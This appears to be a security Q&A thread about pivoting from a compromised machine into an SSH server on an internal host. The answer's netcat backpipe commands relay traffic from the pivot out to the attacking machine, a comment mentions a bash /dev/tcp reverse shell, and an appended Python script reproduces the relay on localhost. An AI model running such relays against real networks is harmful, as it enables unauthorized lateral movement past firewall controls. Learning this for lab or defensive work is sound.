
So I have a shell into machine A, which doesn't have ssh installed and which I can't get a tty shell on (I've tried all of the tty cheat sheets; I think this is intentional).

Through machine A I can see machine B, which has an ssh server running on port 2222.

What I'd like to do is either figure out how to use netcat to connect to ssh manually, or use netcat to go from my attacking machine to machine A to machine B.

I first tried nc -lvp 444 -c 'nc machine.b 2222' but I can't bind to Machine A; I'm guessing firewall rules.

Next I tried forwarding the connection back to my attacking machine with nc attacking.machine 444 -c 'nc machine.b 2222', which works, but I realized that once it's forwarded back to my attacking machine, I can't access the port to connect to it with ssh.

This is the network design... I think:

[image: network diagram (attacking machine -> machine A -> machine B)]

DotNetRussell
    Have you tried /dev/tcp? I wrote the addition to http://pwnwiki.io/#!scripting/bash.md (search for "bash reverse shell"); you may want to swap to socat on the receiving side to support readline. – Oneiroi Jul 04 '18 at 09:39
  • I think socat might be the answer. I saw it but thought it needed to be on the pivot machine. I read the docs and it makes sense – DotNetRussell Jul 04 '18 at 12:17

1 Answer


Okay, so the answer is to use a netcat relay. I found this cheat sheet from SANS that has some great nc commands on it. I also got some sage wisdom from @BetterSafteyNet, which led me to the PDF. With their powers combined I came up with the series of commands below to make this work.

Using the diagram I originally posted as a legend:

First, set up the listener relay on the attacking machine:

~$ cd /tmp; mknod backpipe p
~$ nc -lvp <listen port 1> 0<backpipe | nc -lvp <listen port 2> | tee backpipe

Next, set up the client-to-client relay on Machine A (the pivot machine):

~$ cd /tmp; mknod backpipe p
~$ nc <machine b ip> <ssh port> 0<backpipe | nc <attack machine ip> <listen port 1> | tee backpipe

Finally, make the SSH connection from the attacking machine:

~$ ssh id@127.0.0.1 -p <listen port 2>
DotNetRussell
    Thank you, this was the first time I had to pivot (just starting to learn!) and you helped me a ton. I'm currently in a docker container and can't get a reverse shell, but I CAN get into the mysql through the tunnel – Yablargo Oct 21 '19 at 02:37
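The netcat pipelines in the answer only carry traffic one way; the `backpipe` FIFO plus `tee` is what feeds the return stream back into the first `nc`'s stdin so the relay becomes bidirectional. The following is an added example (not part of the original answer or the SANS cheat sheet) that reproduces the same three-hop topology in Python sockets on localhost so the data flow can be traced end to end: an upper-casing echo service stands in for machine B's sshd, `pivot_relay` plays the client-to-client relay on Machine A, `attacker_relay` plays the two-listener relay on the attacking machine, and the `ssh` step is a plain client connecting to listen port 2. All function names and the ephemeral ports are my own choices.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes from src to dst until src closes, then close dst's write side.
    One pump per direction replaces the role of the FIFO + tee in the nc version."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def listen(host="127.0.0.1"):
    """Bind a listener on an ephemeral port (port 0) so the demo never collides."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, 0))
    s.listen(1)
    return s


def relay(sock_a, sock_b):
    """Bidirectional relay between two connected sockets."""
    for a, b in ((sock_a, sock_b), (sock_b, sock_a)):
        threading.Thread(target=pump, args=(a, b), daemon=True).start()


def attacker_relay(listen1, listen2):
    """Attacking machine: 'nc -lvp P1 0<backpipe | nc -lvp P2 | tee backpipe'.
    Accept the pivot on listen port 1, the local client on listen port 2, then shuttle."""
    pivot_conn, _ = listen1.accept()
    client_conn, _ = listen2.accept()
    relay(pivot_conn, client_conn)


def pivot_relay(target_addr, attacker_addr):
    """Machine A: 'nc B 2222 0<backpipe | nc attacker P1 | tee backpipe'.
    Both legs are outbound, which is why this works when A cannot bind a port."""
    to_b = socket.create_connection(target_addr)
    to_attacker = socket.create_connection(attacker_addr)
    relay(to_b, to_attacker)


def echo_service(listener):
    """Stand-in for machine B's sshd: upper-case whatever arrives (constructed for the demo)."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data.upper())


def run_demo(payload=b"hello through the relay\n"):
    """Wire up B, the attacker relay and the pivot, then act as the 'ssh' client
    on listen port 2 and return whatever came back through the three hops."""
    b_listener = listen()
    attacker_l1 = listen()   # <listen port 1>: where the pivot calls in
    attacker_l2 = listen()   # <listen port 2>: where the local ssh client connects
    threading.Thread(target=echo_service, args=(b_listener,), daemon=True).start()
    threading.Thread(target=attacker_relay, args=(attacker_l1, attacker_l2), daemon=True).start()
    threading.Thread(target=pivot_relay,
                     args=(b_listener.getsockname(), attacker_l1.getsockname()),
                     daemon=True).start()

    client = socket.create_connection(attacker_l2.getsockname())
    client.sendall(payload)
    client.shutdown(socket.SHUT_WR)
    out = b""
    while True:
        chunk = client.recv(4096)
        if not chunk:
            break
        out += chunk
    client.close()
    for l in (b_listener, attacker_l1, attacker_l2):
        l.close()
    return out


if __name__ == "__main__":
    print(run_demo())  # expected: b'HELLO THROUGH THE RELAY\n'
```

Note the start order mirrors the answer: the attacker's two listeners exist before the pivot dials out, and the pivot's connection to listen port 1 is accepted before the local client on listen port 2. In the nc version the same ordering matters, since the second `nc -lvp` only starts reading once the pipeline is up, and `tee` also echoes the return stream to your terminal, which is harmless noise for an SSH session.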